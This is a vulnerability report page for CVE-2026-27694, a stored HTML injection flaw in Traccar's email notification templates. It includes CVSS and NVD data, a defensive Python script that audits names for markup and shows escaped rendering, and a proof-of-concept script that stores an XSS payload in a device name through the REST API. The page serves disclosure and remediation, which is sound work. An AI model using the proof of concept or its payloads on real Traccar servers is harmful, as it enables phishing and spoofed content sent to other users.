Security Vulnerability Report
CVE-2026-27694 CVSS 5.4 MEDIUM

Published: 2026-05-05 13:16:29
Last Modified: 2026-05-08 20:03:41

Description

Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the email notification templates insert user-controlled device, geofence, and driver names into HTML email output without proper escaping. An attacker with low privileges can store crafted HTML in these fields, which is then rendered in notification emails sent to other users with access to the affected devices. This can lead to phishing or spoofed email content. This issue is fixed in version 6.13.0.
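The description above names the two halves of the bug: user-controlled names are stored unchecked, and the email template interpolates them without escaping. The script below is an added example, not code from the page or from the Traccar project. It does two things a practitioner would want: it audits device, geofence and driver records for names that contain HTML markup (the stored half), and it contrasts raw interpolation of such a name into a notification template with the HTML-escaped form that the 6.13.0 fix is described as applying (the rendering half). The sample records, the TEMPLATE string, the MARKUP_RE heuristic and the fetch_objects helper (which assumes HTTP Basic auth against /api/devices, /api/geofences and /api/drivers on the default port 8082) are assumptions made for illustration; the template is a stand-in, not Traccar's own.

```python
import base64
import html
import json
import re
import urllib.request

# Constructed sample records shaped like Traccar /api/devices, /api/geofences
# and /api/drivers responses. They are not real data; two names carry markup.
SAMPLE_OBJECTS = {
    "devices": [
        {"id": 1, "name": "Truck 17", "uniqueId": "357"},
        {"id": 2, "name": 'Van 3 <a href="https://example.invalid/login">Re-enter password</a>',
         "uniqueId": "358"},
    ],
    "geofences": [
        {"id": 5, "name": "Depot"},
        {"id": 6, "name": "<img src=x onerror=alert(1)>"},
    ],
    "drivers": [
        {"id": 9, "name": "Alice", "uniqueId": "D1"},
    ],
}

# Heuristic (assumption): a tag-like token or an HTML entity in a free-text name.
# Names legitimately never need either, so any hit deserves a look.
MARKUP_RE = re.compile(r"<[a-zA-Z/!][^>]*>|&#?[a-zA-Z0-9]+;")


def find_markup(objects):
    """Return (kind, id, name) for every record whose name contains markup."""
    hits = []
    for kind, records in objects.items():
        for rec in records:
            name = rec.get("name") or ""
            if MARKUP_RE.search(name):
                hits.append((kind, rec["id"], name))
    return hits


# Stand-in for one line of a notification template (assumption, not Traccar's).
# str.format only parses the template, so braces inside a name are inert here.
TEMPLATE = "<p>Device {device} entered geofence {geofence}</p>"


def render_unescaped(device_name, geofence_name):
    """The vulnerable pattern: the name lands in the HTML body verbatim."""
    return TEMPLATE.format(device=device_name, geofence=geofence_name)


def render_escaped(device_name, geofence_name):
    """The hardened pattern: escape <, >, &, quotes before interpolation."""
    return TEMPLATE.format(device=html.escape(device_name, quote=True),
                           geofence=html.escape(geofence_name, quote=True))


def fetch_objects(base_url, username, password):
    """Pull the three object lists from a live instance (assumption: HTTP Basic
    auth is accepted on the REST API). Not exercised offline."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    out = {}
    for kind in ("devices", "geofences", "drivers"):
        req = urllib.request.Request(f"{base_url}/api/{kind}",
                                     headers={"Authorization": "Basic " + token})
        with urllib.request.urlopen(req, timeout=10) as resp:
            out[kind] = json.load(resp)
    return out


if __name__ == "__main__":
    # Offline run over the constructed sample; swap in
    # fetch_objects("http://localhost:8082", "admin", "admin") for a live audit.
    for kind, oid, name in find_markup(SAMPLE_OBJECTS):
        print(f"[!] {kind} id={oid} name contains markup: {name!r}")
    dev = SAMPLE_OBJECTS["devices"][1]["name"]
    geo = SAMPLE_OBJECTS["geofences"][1]["name"]
    print("raw:    ", render_unescaped(dev, geo))
    print("escaped:", render_escaped(dev, geo))
```

Upgrading to 6.13.0 neutralises names at render time; it does not rewrite names that were stored while an affected version was running. Running find_markup against the live API after the upgrade shows which records a low-privileged user already planted and which are worth cleaning up or attributing.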

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:* - VULNERABLE
Traccar >= 6.11.1, < 6.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Configuration
TARGET_URL = "http://localhost:8082/api/devices"
USER_TOKEN = "<LOW_PRIVILEGE_USER_TOKEN>"  # API token of a user who can already see the device
DEVICE_ID = 1

# Payload stored in the device name. The advisory describes HTML injection into
# notification emails; script is used here only as a visible marker. Most mail
# clients never execute JavaScript, so the realistic outcome is spoofed or
# phishing content in the email body, not an alert popup.
xss_payload = '<img src=x onerror=alert(\'XSS-CVE-2026-27694\')>'

headers = {
    "Authorization": f"Bearer {USER_TOKEN}",
    "Content-Type": "application/json"
}

# Device object with the malicious name. PUT replaces the stored object, so a
# careful test GETs the device first and changes only the name field.
payload_data = {
    "id": DEVICE_ID,
    "name": xss_payload,
    "groupId": 0,
    "category": "default"
}

try:
    # Update the device name; the server stores it without escaping
    response = requests.put(f"{TARGET_URL}/{DEVICE_ID}", json=payload_data,
                            headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Payload stored successfully.")
        print("[+] Trigger an event (e.g., geofence entry) so a notification email is sent.")
        print("[+] Inspect the received email: the markup appears unescaped in the body.")
    else:
        print(f"[-] Failed to store payload. Status code: {response.status_code}")
        print(response.text)
except requests.RequestException as e:
    print(f"[-] An error occurred: {e}")

References

https://github.com/traccar/traccar/security/advisories/GHSA-6hfr-mj4m-hrvv (Vendor Advisory, Exploit, Mitigation)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-27694",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-05T13:16:28.513",
    "lastModified": "2026-05-08T20:03:41.007",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the email notification templates insert user-controlled device, geofence, and driver names into HTML email output without proper escaping. An attacker with low privileges can store crafted HTML in these fields, which is then rendered in notification emails sent to other users with access to the affected devices. This can lead to phishing or spoofed email content. This issue is fixed in version 6.13.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "6.11.1",
                "versionEndExcluding": "6.13.0",
                "matchCriteriaId": "A453268E-69E6-4CE2-A341-8890520DF28E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/traccar/traccar/security/advisories/GHSA-6hfr-mj4m-hrvv",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory", "Mitigation"]
      },
      {
        "url": "https://github.com/traccar/traccar/security/advisories/GHSA-6hfr-mj4m-hrvv",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory", "Mitigation"]
      }
    ]
  }
}